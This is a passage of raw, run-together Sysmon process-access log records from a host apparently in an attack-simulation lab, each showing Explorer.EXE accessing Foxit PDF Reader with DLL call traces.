Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 